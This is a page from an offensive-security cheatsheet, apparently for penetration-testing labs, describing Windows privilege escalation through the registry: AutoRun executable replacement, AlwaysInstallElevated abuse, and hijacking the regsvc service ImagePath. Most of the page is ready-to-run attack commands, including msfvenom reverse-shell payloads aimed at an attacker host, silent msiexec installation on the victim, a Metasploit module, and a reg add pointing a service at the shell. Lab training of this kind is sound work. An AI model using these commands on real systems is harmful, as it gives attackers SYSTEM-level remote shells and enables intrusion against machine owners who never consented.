coffeetohack
  • Introduction
  • Methodology
  • Cheatsheet
    • Ports
    • Nmap
    • Directory Bruteforce
    • Password Cracking
    • Web Server
    • Shells
    • TTY Shells
    • File Transfers
    • XSS | SQLi
    • LFI / RFI
    • File Uploads
    • Port Forwarding
  • Framework/Application
    • CMS Made Simple
    • Blundit
    • Wordpress
    • OctoberCMS
    • Tomcat
  • Windows PrivEsc
    • Scheduled Tasks
    • Stored Passwords
    • Installed Apps
    • Unquoted Service Path
    • Binary Paths
    • DLL Hijacking
    • Startup Apps
    • Executable Files
    • Registry
    • Run As
  • Linux PrivEsc
    • Sudo
    • SUID
    • Capabilities
    • Scheduled Tasks
    • NFS Root Squashing
    • Docker
  • Buffer Overflow
    • dostackbufferoverflow
    • BoF 1
    • Vulnserver
    • Brainpan
    • Brainstorm
  • Initial Shell Exploits
  • PrivEsc Exploits
  • Cisco Packet Tracer
  • Active Directory
    • Methodology
    • LLMNR Poisioning
    • Cracking Hashes
    • SMB Relay
    • IPv6 Attacks
    • PowerView
    • Bloodhound
    • Pass The Hash
    • Token Impersonation
    • Kerberoasting
    • GPP Attack
    • URL File Attack
    • PrintNightmare
    • Mimikatz
    • Golden Ticket Attack
  • OSINT
Powered by GitBook
On this page
  • AUTORUN:
  • ALWAYS INSTALL ELEVATED:
  • REGSVC:

Was this helpful?

  1. Windows PrivEsc

Registry

AUTORUN:

You will get a list of AutoRun programs from your enumeration scripts. It is shown under AutoRun applications in winPEAS. Check if those programs have RW access. Create a malicious executable of the AutoRun program and replace the original one. This however requires a restart of the machine for the AutoRun to give you a shell. This means that, you will only get a shell when the Administrator logs into his account. The administrator receives a prompt to run a program. Once he accepts the prompt, you will get a reverse shell.

ALWAYS INSTALL ELEVATED:

There are packages in Windows called msi packages. Msi packages are basically Windows installers. For the exploit to work, you need to have 2 registry settings enabled.

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Check for both if AlwaysInstallElevated is set to 1.

METHOD 1:

Run PowerUp.ps1 and use the Abuse function to add a user or perform some other task

METHOD 2:

Create a metasploit reverse shell. Transfer it to the machine. Run it. 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f msi -o shell.msi
#Transfer it to victim machine and run:
msiexec /quiet /qn /i C:\Temp\setup.msi

METHOD 3:

#Get a meterpreter shell
#Background the session: background
#Use exploit
use exploit/windows/local/always_install_elevated
#Then set the SESSION that was in background

REGSVC:

winPEAS: Looking if you can modify any service registry

#Suppose that the registry is:
HKLM\system\currentcontrolset\services\regsvc (Interactive [TakeOwnership])

#Verify the permissions of the service:
#CMD
accesschk /accepteula -uvwqk HKLM:\System\CurrentControlSet\Services\regsvc

#POWERSHELL
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List

#Check if we can start the service
accesschk /accepteula -ucqv user regsvc

#Query the service info
reg query HKLM:\System\CurrentControlSet\Services\regsvc

#Create a reverse shell and transfer it to C:\Temp
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f exe -o shell.exe

#Run the following command
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\shell.exe /f

#Start a listener and the service
sc start regsvc

PreviousExecutable FilesNextRun As

Last updated 4 years ago

Was this helpful?